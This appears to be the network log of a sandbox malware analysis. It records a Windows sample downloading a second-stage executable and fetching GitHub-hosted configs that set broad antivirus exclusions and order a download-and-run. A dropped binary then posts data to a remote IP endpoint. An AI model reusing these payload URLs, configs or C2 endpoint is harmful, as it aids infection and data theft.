                                                Aug 27, 2024 13:05:53.122940063 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.122955084 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.123007059 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.123012066 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.123374939 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.205302000 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.205317020 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.205415964 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.205421925 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.205780983 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.205801010 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.205851078 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.205854893 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.205878973 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.205904961 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.207468033 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.207482100 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.207539082 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.207542896 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.207669973 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.210988998 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.211004019 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.211057901 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.211064100 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.211424112 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.211925983 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.211939096 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.211991072 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.211996078 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.212367058 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.214973927 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.214996099 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215046883 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.215050936 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215364933 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215379953 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215413094 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215436935 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.215441942 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215466976 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.215492964 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:53.215667009 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.215981007 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:53.663254023 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:53.663301945 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:53.663372993 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:53.664318085 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:53.664331913 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.146549940 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.146866083 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.146888971 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.146977901 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.146982908 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.147918940 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.147988081 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.239636898 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.239725113 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.239758968 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.284506083 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.287533045 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.287547112 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.335323095 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.386416912 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.386482954 CEST44349737185.199.111.133192.168.2.4
                                                Aug 27, 2024 13:05:54.386646032 CEST49737443192.168.2.4185.199.111.133
                                                Aug 27, 2024 13:05:54.386770010 CEST49737443192.168.2.4185.199.111.133
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Aug 27, 2024 13:05:45.378835917 CEST | 64043 | 53 | 192.168.2.4 | 1.1.1.1
                                                Aug 27, 2024 13:05:45.385963917 CEST | 53 | 64043 | 1.1.1.1 | 192.168.2.4
                                                Aug 27, 2024 13:05:46.678253889 CEST | 60698 | 53 | 192.168.2.4 | 1.1.1.1
                                                Aug 27, 2024 13:05:46.698316097 CEST | 53 | 60698 | 1.1.1.1 | 192.168.2.4
                                                Aug 27, 2024 13:05:53.648963928 CEST | 54986 | 53 | 192.168.2.4 | 1.1.1.1
                                                Aug 27, 2024 13:05:53.660893917 CEST | 53 | 54986 | 1.1.1.1 | 192.168.2.4
                                                Aug 27, 2024 13:07:19.793945074 CEST | 54049 | 53 | 192.168.2.4 | 1.1.1.1
                                                Aug 27, 2024 13:07:19.800834894 CEST | 53 | 54049 | 1.1.1.1 | 192.168.2.4
                                                Aug 27, 2024 13:07:29.656049013 CEST | 53736 | 53 | 192.168.2.4 | 1.1.1.1
                                                Aug 27, 2024 13:07:29.664385080 CEST | 53 | 53736 | 1.1.1.1 | 192.168.2.4
                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                Aug 27, 2024 13:05:45.378835917 CEST | 192.168.2.4 | 1.1.1.1 | 0x33ee | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:46.678253889 CEST | 192.168.2.4 | 1.1.1.1 | 0x20d4 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:53.648963928 CEST | 192.168.2.4 | 1.1.1.1 | 0xd3e3 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:07:19.793945074 CEST | 192.168.2.4 | 1.1.1.1 | 0xf183 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:07:29.656049013 CEST | 192.168.2.4 | 1.1.1.1 | 0x1643 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                Aug 27, 2024 13:05:45.385963917 CEST | 1.1.1.1 | 192.168.2.4 | 0x33ee | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:45.385963917 CEST | 1.1.1.1 | 192.168.2.4 | 0x33ee | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:45.385963917 CEST | 1.1.1.1 | 192.168.2.4 | 0x33ee | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:46.698316097 CEST | 1.1.1.1 | 192.168.2.4 | 0x20d4 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:46.698316097 CEST | 1.1.1.1 | 192.168.2.4 | 0x20d4 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:46.698316097 CEST | 1.1.1.1 | 192.168.2.4 | 0x20d4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.51.233 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:46.698316097 CEST | 1.1.1.1 | 192.168.2.4 | 0x20d4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.234.33 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:46.698316097 CEST | 1.1.1.1 | 192.168.2.4 | 0x20d4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.123.137 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:46.698316097 CEST | 1.1.1.1 | 192.168.2.4 | 0x20d4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.66.108 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:46.698316097 CEST | 1.1.1.1 | 192.168.2.4 | 0x20d4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.208.33 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:46.698316097 CEST | 1.1.1.1 | 192.168.2.4 | 0x20d4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.122.81 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:46.698316097 CEST | 1.1.1.1 | 192.168.2.4 | 0x20d4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.88.116 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:46.698316097 CEST | 1.1.1.1 | 192.168.2.4 | 0x20d4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.86.131 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:53.660893917 CEST | 1.1.1.1 | 192.168.2.4 | 0xd3e3 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:53.660893917 CEST | 1.1.1.1 | 192.168.2.4 | 0xd3e3 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:53.660893917 CEST | 1.1.1.1 | 192.168.2.4 | 0xd3e3 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:05:53.660893917 CEST | 1.1.1.1 | 192.168.2.4 | 0xd3e3 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:07:19.800834894 CEST | 1.1.1.1 | 192.168.2.4 | 0xf183 | No error (0) | github.com | | 140.82.121.3 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:07:29.664385080 CEST | 1.1.1.1 | 192.168.2.4 | 0x1643 | No error (0) | httpbin.org | | 3.211.178.193 | A (IP address) | IN (0x0001) | false
                                                Aug 27, 2024 13:07:29.664385080 CEST | 1.1.1.1 | 192.168.2.4 | 0x1643 | No error (0) | httpbin.org | | 34.194.69.213 | A (IP address) | IN (0x0001) | false
                                                • bitbucket.org
                                                • bbuseruploads.s3.amazonaws.com
                                                • raw.githubusercontent.com
                                                • github.com
                                                • https:
                                                • 45.125.66.18
                                                • httpbin.org
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.4 | 49730 | 185.166.143.49 | 443 | 7612 | C:\Users\user\Desktop\UBONg7lmVR.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-27 11:05:46 UTC | 109 | OUT | GET /updated24/updated24/downloads/Updated11.12.exe HTTP/1.1
                                                Host: bitbucket.org
                                                Connection: Keep-Alive
                                                2024-08-27 11:05:46 UTC | 4997 | IN | HTTP/1.1 302 Found
                                                Date: Tue, 27 Aug 2024 11:05:46 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 0
                                                Server: AtlassianEdge
                                                Location: https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNM7G6QD3X&Signature=axhudmqEvDM%2FSUhiHDRgUnl7%2FLM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBPQNDA%2Bh4G46KXw4LFfA9Io2JrUo7qexVGkmClXZ9XZAiEArKzvP5lXvxR0bzw4zii8AXSrZI4T8YzSZDU5HRHXvGAqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDBQ5D%2BO3Og5loUNzrCqEAlNSqyxdg90lqENE7Z1SnCpP6CAEKvQ2ZHflx5%2B9h97EGF%2BXeWo6gNL%2FKeau4g9mlbbEotcMw%2BrrPvVtwNlOZZrAvPyqKCz9MZpRG%2BpiC03DY8EyD%2BgUcSrXtsYVj1pY8epvtBzRmE%2FiDtiuZev9AlPjjVReOc21XzmG2S5RzBnktovq9Demuoz4DZKVKfYpiyX89uYSRKAsxMv%2FByN7IdIq6qCZVRx0QazWdIaUsZX5xlSjdEpSJPis3lWADR%2FBDkpX3wpSdaWD8PCizYGKT%2F2E2%2FTQ6T9aJkUzXz9IvClo4ct3sHAuc3qQYEfeMTJWLjMFtZKl8vhj%2BumqVAPYpTlp6oAVMNfjtrYGOp0BKT9YWtFy1GR5MK5hXid7YqSJRvsd%2FwKLvb%2BM6KMzyorpcCHfTbjl0lcEiPM9exK3azj%2BG9Z6KbEtKqhP2JBh1l8 [TRUNCATED]
                                                Expires: Tue, 27 Aug 2024 11:05:46 GMT
                                                Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                X-Used-Mesh: False
                                                Vary: Accept-Language, Origin
                                                Content-Language: en
                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                X-Dc-Location: Micros-3
                                                X-Served-By: af20b92cf0ae
                                                X-Version: e13784b917ea
                                                X-Static-Version: e13784b917ea
                                                X-Request-Count: 354
                                                X-Render-Time: 0.06661272048950195
                                                X-B3-Traceid: b4582ced187d484eb0f1469616170840
                                                X-B3-Spanid: d6d8106431675a2f
                                                X-Frame-Options: SAMEORIGIN
                                                Content-Security-Policy: base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly. [TRUNCATED]
                                                X-Usage-Quota-Remaining: 998923.218
                                                X-Usage-Request-Cost: 1095.63
                                                X-Usage-User-Time: 0.020974
                                                X-Usage-System-Time: 0.011895
                                                X-Usage-Input-Ops: 0
                                                X-Usage-Output-Ops: 0
                                                Age: 0
                                                X-Cache: MISS
                                                X-Content-Type-Options: nosniff
                                                X-Xss-Protection: 1; mode=block
                                                Atl-Traceid: b4582ced187d484eb0f1469616170840
                                                Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.4 | 49733 | 52.216.51.233 | 443 | 7612 | C:\Users\user\Desktop\UBONg7lmVR.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-27 11:05:47 UTC | 1211 | OUT | GET /5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNM7G6QD3X&Signature=axhudmqEvDM%2FSUhiHDRgUnl7%2FLM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBPQNDA%2Bh4G46KXw4LFfA9Io2JrUo7qexVGkmClXZ9XZAiEArKzvP5lXvxR0bzw4zii8AXSrZI4T8YzSZDU5HRHXvGAqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDBQ5D%2BO3Og5loUNzrCqEAlNSqyxdg90lqENE7Z1SnCpP6CAEKvQ2ZHflx5%2B9h97EGF%2BXeWo6gNL%2FKeau4g9mlbbEotcMw%2BrrPvVtwNlOZZrAvPyqKCz9MZpRG%2BpiC03DY8EyD%2BgUcSrXtsYVj1pY8epvtBzRmE%2FiDtiuZev9AlPjjVReOc21XzmG2S5RzBnktovq9Demuoz4DZKVKfYpiyX89uYSRKAsxMv%2FByN7IdIq6qCZVRx0QazWdIaUsZX5xlSjdEpSJPis3lWADR%2FBDkpX3wpSdaWD8PCizYGKT%2F2E2%2FTQ6T9aJkUzXz9IvClo4ct3sHAuc3qQYEfeMTJWLjMFtZKl8vhj%2BumqVAPYpTlp6oAVMNfjtrYGOp0BKT9YWtFy1GR5MK5hXid7YqSJRvsd%2FwKLvb%2BM6KMzyorpcCHfTbjl0lcEiPM9exK3azj%2BG9Z6KbEtKqhP2JBh1l8nNQ0B8rOE9SFVdCbfZZDWbRo0WGaMriccmr%2FYO0vC% [TRUNCATED]
                                                Host: bbuseruploads.s3.amazonaws.com
                                                Connection: Keep-Alive
                                                2024-08-27 11:05:47 UTC | 546 | IN | HTTP/1.1 200 OK
                                                x-amz-id-2: dx92nqmal5BChswhOrzMbv24rk05Y0l9zY2K+If8WYJI6kxlc4sHWau0ZqdUlvpbzIyNyGTLg9s=
                                                x-amz-request-id: KP6WQX6Q8E1ZASKR
                                                Date: Tue, 27 Aug 2024 11:05:48 GMT
                                                Last-Modified: Mon, 26 Aug 2024 20:19:25 GMT
                                                ETag: "a499c507987982c951093e21df0c0d96"
                                                x-amz-server-side-encryption: AES256
                                                x-amz-version-id: izy_Ds9c9HofVlO8w4O6Dv7xs.26iHyB
                                                Content-Disposition: attachment; filename="Updated11.12.exe"
                                                Accept-Ranges: bytes
                                                Content-Type: application/x-msdownload
                                                Server: AmazonS3
                                                Content-Length: 8077824
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.4 | 49737 | 185.199.111.133 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-27 11:05:54 UTC | 140 | OUT | GET /workhasf/kelm/main/yjsefceawd.json HTTP/1.1
                                                Host: raw.githubusercontent.com
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 11:05:54 UTC | 897 | IN | HTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 254
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "2b7d5e7976210b6b6243eb731562fda7633790a0d3e8fe06e97c427ca3df3b40"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: C138:B7845:695157:749E29:66CDB080
                                                Accept-Ranges: bytes
                                                Date: Tue, 27 Aug 2024 11:05:54 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-ewr-kewr1740026-EWR
                                                X-Cache: HIT
                                                X-Cache-Hits: 0
                                                X-Timer: S1724756754.290051,VS0,VE47
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 0e29a9fb76c2652e13e82cf7cca1cb75ccd83a89
                                                Expires: Tue, 27 Aug 2024 11:10:54 GMT
                                                Source-Age: 0
                                                2024-08-27 11:05:54 UTC | 254 | IN | Data Ascii: { "folder_path": "C:\\Reka", "add_exclusions": true, "exclusion_paths": [ "C:\\Users", "C:\\Windows", "C:\\Program Files", "C:\\Program Files (x86)", "C:\\Recovery", "C:\\Reka", "%USERPROFILE%\\Desktop" ]}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.4 | 49738 | 185.199.111.133 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-27 11:05:54 UTC | 141 | OUT | GET /workhasf/kelm/main/nepipirusas.json HTTP/1.1
                                                Host: raw.githubusercontent.com
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 11:05:55 UTC | 898 | IN | HTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 271
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "8afdee626e191786c845a423ef408c35314075f4a1c4350f44a55f7503d99b00"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: F629:28EE07:6F5FBC:7AAC5E:66CDB08B
                                                Accept-Ranges: bytes
                                                Date: Tue, 27 Aug 2024 11:05:54 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-ewr-kewr1740058-EWR
                                                X-Cache: HIT
                                                X-Cache-Hits: 0
                                                X-Timer: S1724756755.934187,VS0,VE57
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 26bd0ffca3bb2fe4ba322dd6e746cb37518d9bf8
                                                Expires: Tue, 27 Aug 2024 11:10:54 GMT
                                                Source-Age: 0
                                                2024-08-27 11:05:55 UTC | 271 | IN | Data Ascii: { "downloads": [ { "download_url": "https://github.com/workhasf/kelm/raw/main/iconozave.exe", "file_name": "rapnewsa.exe", "run": true }, { "download_url": "", "file_name": "dll.exe", "run": fals


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.4 | 49747 | 140.82.121.3 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-27 11:07:20 UTC | 127 | OUT | GET /workhasf/kelm/raw/main/iconozave.exe HTTP/1.1
                                                Host: github.com
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 11:07:20 UTC | 547 | IN | HTTP/1.1 302 Found
                                                Server: GitHub.com
                                                Date: Tue, 27 Aug 2024 11:07:20 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                Access-Control-Allow-Origin:
                                                Location: https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe
                                                Cache-Control: no-cache
                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                X-Frame-Options: deny
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 0
                                                Referrer-Policy: no-referrer-when-downgrade
                                                2024-08-27 11:07:20 UTC | 3261 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.4 | 49748 | 185.199.111.133 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-27 11:07:21 UTC | 204 | OUT | GET /workhasf/kelm/main/iconozave.exe HTTP/1.1
                                                Host: raw.githubusercontent.com
                                                User-Agent: Go-http-client/1.1
                                                Referer: https://github.com/workhasf/kelm/raw/main/iconozave.exe
                                                Accept-Encoding: gzip
                                                2024-08-27 11:07:21 UTC | 899 | IN | HTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 38912
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: application/octet-stream
                                                ETag: "12c37a0d92e3f8714d00d8ffa40d644b8e2520270caa1a870ac073d1e42f9dd0"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: 97AB:2BC85:40E203:48916A:66CDB363
                                                Accept-Ranges: bytes
                                                Date: Tue, 27 Aug 2024 11:07:21 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-nyc-kteb1890075-NYC
                                                X-Cache: MISS
                                                X-Cache-Hits: 0
                                                X-Timer: S1724756841.382007,VS0,VE99
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 354c32c8894117551a6f03a6326ac843843e7e37
                                                Expires: Tue, 27 Aug 2024 11:12:21 GMT
                                                Source-Age: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.4 | 49749 | 45.125.66.18 | 443 | 8032 | C:\Reka\rapnewsa.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-27 11:07:26 UTC | 287 | OUT | POST /api/receiver/recv HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48
                                                Content-Length: 3160
                                                Host: 45.125.66.18
                                                2024-08-27 11:07:26 UTC | 3160 | OUT | Data Ascii: {a33c7340-61ca-11ee-8c18-806e6f6e6963}
                                                2024-08-27 11:07:27 UTC | 231 | IN | HTTP/1.1 201 Created
                                                Server: nginx/1.18.0
                                                Date: Tue, 27 Aug 2024 11:07:27 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 4230
                                                Connection: close
                                                X-Powered-By: Express
                                                ETag: W/"1086-eeEIvwQRvsIx4B3isHTXuBfT8l0"


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.4 | 49750 | 3.211.178.193 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-27 11:07:30 UTC | 95 | OUT | GET /get HTTP/1.1
                                                Host: httpbin.org
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 11:07:30 UTC | 225 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 27 Aug 2024 11:07:30 GMT
                                                Content-Type: application/json
                                                Content-Length: 238
                                                Connection: close
                                                Server: gunicorn/19.9.0
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Credentials: true
                                                2024-08-27 11:07:30 UTC | 238 | IN | Data Ascii: { "args": {}, "headers": { "Host": "httpbin.org", "User-Agent": "Go-http-client/1.1", "X-Amzn-Trace-Id": "Root=1-66cdb372-2d9be2693f4c37486eda1279" }, "origin": "8.46.123.33", "url": "https://httpbin.org/get"}


                                                Target ID:0
                                                Start time:07:05:41
                                                Start date:27/08/2024
                                                Path:C:\Users\user\Desktop\UBONg7lmVR.exe
                                                Wow64 process (32bit):true
